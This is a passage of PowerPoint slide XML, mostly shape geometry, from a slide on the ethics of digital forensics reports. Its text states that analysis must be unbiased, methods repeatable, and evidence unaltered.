                  <a:lnTo>
                    <a:pt x="1101454" y="1275361"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1101371" y="1275107"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1264920" h="4330700">
                  <a:moveTo>
                    <a:pt x="1065049" y="1177063"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1065143" y="1177317"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1065049" y="1177063"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1264920" h="4330700">
                  <a:moveTo>
                    <a:pt x="1025044" y="1081432"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1025097" y="1081559"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1025044" y="1081432"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1264920" h="4330700">
                  <a:moveTo>
                    <a:pt x="981529" y="988185"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="981602" y="988341"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="981529" y="988185"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1264920" h="4330700">
                  <a:moveTo>
                    <a:pt x="948774" y="897536"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="934366" y="897536"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="981529" y="988185"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="995586" y="988087"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="993040" y="982626"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="948774" y="897536"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1264920" h="4330700">
                  <a:moveTo>
                    <a:pt x="898597" y="809779"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="883947" y="809779"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="934493" y="897790"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="934366" y="897536"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="948774" y="897536"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="945669" y="891567"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="898597" y="809779"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1264920" h="4330700">
                  <a:moveTo>
                    <a:pt x="845202" y="725070"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="830099" y="725070"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="884074" y="810033"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="883947" y="809779"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="898597" y="809779"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="894869" y="803302"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="845202" y="725070"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1264920" h="4330700">
                  <a:moveTo>
                    <a:pt x="788410" y="643536"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="772949" y="643536"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="830226" y="725324"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="830099" y="725070"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="845202" y="725070"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="840767" y="718085"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="788410" y="643536"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1264920" h="4330700">
                  <a:moveTo>
                    <a:pt x="599714" y="420016"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="582322" y="420016"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="582576" y="420270"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="649251" y="491136"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="712751" y="565685"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="773076" y="643790"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="772949" y="643536"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="788410" y="643536"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="783236" y="636170"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="722530" y="557557"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="658522" y="482500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="599714" y="420016"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1264920" h="4330700">
                  <a:moveTo>
                    <a:pt x="712497" y="565431"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="712694" y="565685"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="712497" y="565431"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1264920" h="4330700">
                  <a:moveTo>
                    <a:pt x="648997" y="490882"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="649214" y="491136"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="648997" y="490882"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1264920" h="4330700">
                  <a:moveTo>
                    <a:pt x="582421" y="420121"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="582561" y="420270"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="582421" y="420121"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1264920" h="4330700">
                  <a:moveTo>
                    <a:pt x="531000" y="353087"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="512599" y="353087"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="582421" y="420121"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="599714" y="420016"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="591466" y="411253"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="531000" y="353087"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1264920" h="4330700">
                  <a:moveTo>
                    <a:pt x="229606" y="128170"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="205259" y="128170"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="286666" y="177827"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="364898" y="231929"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="440336" y="290476"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="512853" y="353341"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="512599" y="353087"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="531000" y="353087"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="521362" y="343816"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="448210" y="280570"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="372264" y="221642"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="293397" y="167159"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="229606" y="128170"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1264920" h="4330700">
                  <a:moveTo>
                    <a:pt x="440082" y="290349"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="440229" y="290476"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="440082" y="290349"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1264920" h="4330700">
                  <a:moveTo>
                    <a:pt x="364517" y="231675"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="364845" y="231929"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="364517" y="231675"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1264920" h="4330700">
                  <a:moveTo>
                    <a:pt x="286412" y="177700"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="286596" y="177827"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="286412" y="177700"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1264920" h="4330700">
                  <a:moveTo>
                    <a:pt x="121693" y="83593"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="205640" y="128424"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="205259" y="128170"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="229606" y="128170"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="211736" y="117248"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="148942" y="83720"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="122074" y="83720"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="121693" y="83593"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1264920" h="4330700">
                  <a:moveTo>
                    <a:pt x="74259" y="47797"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="72798" y="54002"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="68950" y="59262"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="122074" y="83720"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="148942" y="83720"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="127535" y="72290"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="74259" y="47797"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1264920" h="4330700">
                  <a:moveTo>
                    <a:pt x="39318" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="24919" y="2377"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12426" y="9993"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3456" y="22252"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="36937"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2377" y="51335"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9993" y="63829"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="22252" y="72798"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="36937" y="76255"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="51335" y="73878"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="63829" y="66262"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="68950" y="59262"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="35460" y="43842"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="40794" y="32412"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="75115" y="32412"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="73878" y="24919"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="66262" y="12426"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54002" y="3456"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="39318" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1264920" h="4330700">
                  <a:moveTo>
                    <a:pt x="40794" y="32412"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="35460" y="43842"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="68950" y="59262"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="72798" y="54002"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="74259" y="47797"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="40794" y="32412"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1264920" h="4330700">
                  <a:moveTo>
                    <a:pt x="75115" y="32412"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="40794" y="32412"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="74259" y="47797"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="76255" y="39318"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="75115" y="32412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185915" y="6553200"/>
              <a:ext cx="1035050" cy="680085"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1035050" h="680084">
                  <a:moveTo>
                    <a:pt x="922655" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="112141" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="68472" y="8895"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="32829" y="33162"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8806" y="69169"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="113283"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="566419"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8806" y="610534"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="32829" y="646541"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="68472" y="670808"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="112141" y="679704"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="922655" y="679704"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="966323" y="670808"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1001966" y="646541"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1025989" y="610534"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1034795" y="566419"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1034795" y="113283"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1025989" y="69169"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1001966" y="33162"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="966323" y="8895"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="922655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185915" y="6553200"/>
              <a:ext cx="1035050" cy="680085"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1035050" h="680084">
                  <a:moveTo>
                    <a:pt x="0" y="113283"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="8806" y="69169"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="32829" y="33162"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="68472" y="8895"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="112141" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="922655" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="966323" y="8895"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1001966" y="33162"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1025989" y="69169"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1034795" y="113283"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1034795" y="566419"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1025989" y="610534"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1001966" y="646541"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="966323" y="670808"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="922655" y="679704"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="112141" y="679704"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="68472" y="670808"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="32829" y="646541"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8806" y="610534"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="566419"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="113283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6611239" y="6682231"/>
            <a:ext cx="1847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0" b="1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490461" y="5161534"/>
            <a:ext cx="1046480" cy="692785"/>
            <a:chOff x="6490461" y="5161534"/>
            <a:chExt cx="1046480" cy="692785"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="object 10"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6496811" y="5167884"/>
              <a:ext cx="1033780" cy="680085"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1033779" h="680085">
                  <a:moveTo>
                    <a:pt x="921385" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="111887" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="68365" y="8895"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="32797" y="33162"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8802" y="69169"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="113283"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="566419"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8802" y="610534"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="32797" y="646541"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="68365" y="670808"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="111887" y="679703"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="921385" y="679703"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="964906" y="670808"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1000474" y="646541"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1024469" y="610534"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1033271" y="566419"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1033271" y="113283"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1024469" y="69169"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1000474" y="33162"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="964906" y="8895"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="921385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496811" y="5167884"/>
              <a:ext cx="1033780" cy="680085"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1033779" h="680085">
                  <a:moveTo>
                    <a:pt x="0" y="113283"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="8802" y="69169"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="32797" y="33162"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="68365" y="8895"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="111887" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="921385" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="964906" y="8895"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1000474" y="33162"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1024469" y="69169"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1033271" y="113283"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1033271" y="566419"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1024469" y="610534"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1000474" y="646541"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="964906" y="670808"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="921385" y="679703"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="111887" y="679703"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="68365" y="670808"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="32797" y="646541"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8802" y="610534"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="566419"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="11328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6921500" y="5296916"/>
            <a:ext cx="1847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0" b="1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135370" y="3799078"/>
            <a:ext cx="1046480" cy="690880"/>
            <a:chOff x="6135370" y="3799078"/>
            <a:chExt cx="1046480" cy="690880"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="object 14"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6141720" y="3805428"/>
              <a:ext cx="1033780" cy="678180"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1033779" h="678179">
                  <a:moveTo>
                    <a:pt x="921384" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="111887" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="68365" y="8874"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="32797" y="33083"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8802" y="69008"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="113030"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="565150"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8802" y="609171"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="32797" y="645096"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="68365" y="669305"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="111887" y="678180"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="921384" y="678180"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="964906" y="669305"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1000474" y="645096"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1024469" y="609171"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1033272" y="565150"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1033272" y="113030"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1024469" y="69008"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1000474" y="33083"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="964906" y="8874"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="921384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141720" y="3805428"/>
              <a:ext cx="1033780" cy="678180"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1033779" h="678179">
                  <a:moveTo>
                    <a:pt x="0" y="113030"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="8802" y="69008"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="32797" y="33083"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="68365" y="8874"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="111887" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="921384" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="964906" y="8874"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1000474" y="33083"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1024469" y="69008"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1033272" y="113030"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1033272" y="565150"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1024469" y="609171"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1000474" y="645096"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="964906" y="669305"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="921384" y="678180"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="111887" y="678180"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="68365" y="669305"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="32797" y="645096"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8802" y="609171"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="565150"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="11303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6566154" y="3932631"/>
            <a:ext cx="1847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35" b="1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51546" y="3941445"/>
            <a:ext cx="544512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Analysis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rebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>must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performed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without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Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>bias.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85556" y="5293614"/>
            <a:ext cx="50038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Analysis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rebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>methods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rebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>must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Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>repeatable.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40193" y="6758685"/>
            <a:ext cx="616839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0">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Evidence</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-7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100">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>must</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-7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44484E"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>not</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-10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44484E"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>be</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-8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44484E"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>changed</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-6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44484E"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>or</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-10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44484E"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>manipulated.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229104" y="1882292"/>
            <a:ext cx="12096750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49935" marR="5080" indent="-737870">
              <a:lnSpc>
                <a:spcPct val="114100"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="5">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Digital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forensics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reports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rebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>summarize</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-2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contents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Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>digital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data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conclusions</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-4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rebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>from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dirty="0" sz="2200" spc="-6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investigator's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analysis.</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-3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Principal</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-2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ethics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guide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forensic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research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as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3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>follows: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999488" y="3799332"/>
            <a:ext cx="3352800" cy="3352800"/>
            <a:chOff x="1999488" y="3799332"/>
            <a:chExt cx="3352800" cy="3352800"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="22" name="object 22"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
